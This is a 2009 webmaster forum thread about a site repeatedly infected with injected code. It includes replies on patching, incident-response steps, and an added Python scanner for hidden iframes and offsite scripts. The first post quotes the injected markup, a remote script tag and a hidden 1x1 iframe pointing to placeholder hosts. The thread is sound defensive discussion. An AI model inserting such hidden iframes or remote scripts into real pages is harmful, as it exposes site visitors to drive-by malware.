
Forum Moderators: incrediBILL


Infected site - need help!

by iframe



9:06 am on Apr 22, 2009 (gmt 0)

5+ Year Member

Hi, I've got a big problem with my site, which was infected a couple of times. My site was infected with malicious code:

<!-- ad --><script language=javascript src="http://example.com/show.js"></script><!-- /ad -->
<iframe src="http://example.net/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

I scanned my computer (with Kaspersky) and got no problems with viruses. I changed my FTP password, with no results. Even though I deleted this code, after a few days the problem re-appears. Has anybody had a similar issue? Maybe you guys know the solution for this. I also read an article about it, but still no solution.


[edited by: tedster at 8:22 pm (utc) on April 22, 2009]
[edit reason] switch to example.com [/edit]


8:36 pm on Apr 22, 2009 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member

Hello Schism, and welcome to the forums.

The steps you took would stop the problem if it originates on your local computer. I think it's more likely that the malicious code is being injected directly on your server. It's very important these days to keep all your server applications updated with the most recent patches and software versions.

I know that tech support at many web hosts would like to blame these hacks on poor password security - but in my experience, that's not the core problem. The core problem is using unpatched versions of server applications. Once a common program has been in use for a while, the "dark forces" WILL find security loopholes they can use to hack in.


6:37 am on Apr 23, 2009 (gmt 0)

5+ Year Member

Thanks for the reply (and editing ;) Tedster.
I scanned my PC to avoid uploading infected files to the server.
The problem is also that the issue appears on a page which is not an application/cms/cmr etc. It's just simple HTML + a few elements in PHP and a little bit of JavaScript, but nothing fancy ;).
I also think that the malicious code is injected directly on the server. But still no solution :\


7:13 am on Apr 23, 2009 (gmt 0)

5+ Year Member

Similar malicious code has been added to my home
page recently, this has happened a few times
and the code varies each time it has been added.

Have changed my password and will wait to see
what happens in the future.




7:27 am on Apr 23, 2009 (gmt 0)

5+ Year Member

Hi there- what's the best way of picking up malicious code like that? Is Kaspersky enough or should I be doing more? tnx!


12:11 pm on Apr 23, 2009 (gmt 0)

5+ Year Member


I've changed passwords too, but that didn't help.


6:55 pm on Apr 23, 2009 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member

There's a lot of detail about dealing with different kinds of server hacks in our Google Search forum:

How Hacked Servers Can Hurt Your Traffic [webmasterworld.com]


11:52 pm on Apr 23, 2009 (gmt 0)

WebmasterWorld Senior Member swa66 is a WebmasterWorld Top Contributor of All Time 10+ Year Member

Changing your password is unlikely to help if your server is somehow vulnerable.

Security staff usually has a six step response in place for dealing with security incidents:

1. Prepare

Too late now for some of you, but there is a load to do both to avoid the problems and to prepare what you do when you have an incident.

2. Identification and Detection

Chain of custody starts here. Assigning leadership to the response is also done here, as is coordination.

3. Containment

Make sure it doesn't get worse.

The thing is, once a hacker can change files on a web server, the game is almost over. Either they got access to a database (e.g. via SQL injection, something you should learn about and prevent in step 1), and now the entire database can't be trusted any longer. What if they also changed something else unnoticed (even accidentally)?

Or they found another way in, and you need to identify (step 2) the way they used to get in from your logs.

Decisions need to be taken here: continue vs. abort? There are risks and benefits in both, so the risks should be evaluated.

Backup of the hacked system?
- preserve what you still have
- preserve evidence
- ...
DO NOT overwrite older backups doing this.
(step 1: prepare for making this backup ...)

4. Eradication

Find and remove the vulnerability. Improve defenses.
Find all that went on after the initial attack, and learn from that.

5. Recovery

Yes, almost the last step: recover. Reinstall systems as needed (it's most often easier to start again than to trust something that was hacked and where you might not have found all backdoors, rootkits etc.). It removes a lingering doubt you'll always have if you don't do this.

Rebuild data to a known safe state.

Be extremely careful with any data from the backup in Step 3, but also with older backups, as they too can contain problems already (don't reintroduce the vulnerability etc.).

Validation and putting back in business is part of this of course.

6. Lessons learned
Probably the most important one, as you use it to feed the entire process and improve every step to do better next time. To train developers so they can code with fewer problems, to improve the preparedness for incidents, to improve communication, ...

Important here is that you can also learn from incidents that others have.

These steps aren't always fully sequential, but don't try to get back in business before you know what happened as it'll backfire badly in my experience.

Now I realize most of you don't manage your own servers, so your situation is more complex as you'll need to coordinate this with the provider of that service. It's entirely possible the host got whacked not due to something you did, but your neighbor or the machine itself might have introduced something that got exploited. Few hosts are going to be very open in their communication about this, but you need to involve them anyway as much as possible.
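
For the identification step, one way to pick up markup like the two injected lines quoted in the first post is to parse each page and flag hidden iframes and scripts loaded from unexpected hosts. This is an added example, not part of any poster's message; the allowed-host list, the function names and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site is expected to load scripts from (assumption: adjust per site).
ALLOWED_SCRIPT_HOSTS = {"www.mysite.example", "www.google-analytics.com"}
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def _tiny(value):  # True when a width/height attribute is 0 or 1 (optional "px")
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= 1

class InjectionFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # tuples of (line number, kind, url)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        line = self.getpos()[0]
        src = a.get("src", "")
        if tag == "iframe":
            # Invisible to the visitor: hidden via CSS or sized down to a pixel.
            hidden = HIDDEN_STYLE.search(a.get("style", "")) or (
                _tiny(a.get("width")) and _tiny(a.get("height")))
            if hidden:
                self.findings.append((line, "hidden-iframe", src))
        elif tag == "script" and src:
            host = urlparse(src).hostname  # None for relative (same-site) URLs
            if host and host.lower() not in ALLOWED_SCRIPT_HOSTS:
                self.findings.append((line, "offsite-script", src))

def scan_html(text):
    finder = InjectionFinder()
    finder.feed(text)
    finder.close()
    return finder.findings

# Constructed sample: a small page with the thread's two injected lines added.
SAMPLE = """<html><body>
<script src="/js/menu.js"></script>
<script src="http://www.google-analytics.com/ga.js"></script>
<p>Hello</p>
<!-- ad --><script language=javascript src="http://example.com/show.js"></script><!-- /ad -->
<iframe src="http://example.net/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, kind, url in scan_html(SAMPLE):
        print(f"line {line}: {kind} -> {url}")
```

Run against a copy of the site's files on a schedule, a check like this shows when the injection re-appears, which narrows the log window to search for the way in.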


7:16 am on Apr 24, 2009 (gmt 0)

WebmasterWorld Senior Member dreamcatcher is a WebmasterWorld Top Contributor of All Time 10+ Year Member

Are you on a shared server? The issue might be being caused by someone else's website.



9:04 pm on Apr 24, 2009 (gmt 0)

5+ Year Member


No, it's not a shared server. I wonder if it's not because of JavaScript somehow... Thanks all for the replies! I already did a backup and improved security issues on my website. Now I'm waiting to see what will happen. I will also reply with any results here :)

edit: I also wonder if it is possible (in your opinion, guys) that the injection of malicious code could have happened because of Google Analytics, since the problem somehow appeared after I installed it. I just don't know if I can somehow connect these two facts.

[edited by: Schism at 9:09 pm (utc) on April 24, 2009]

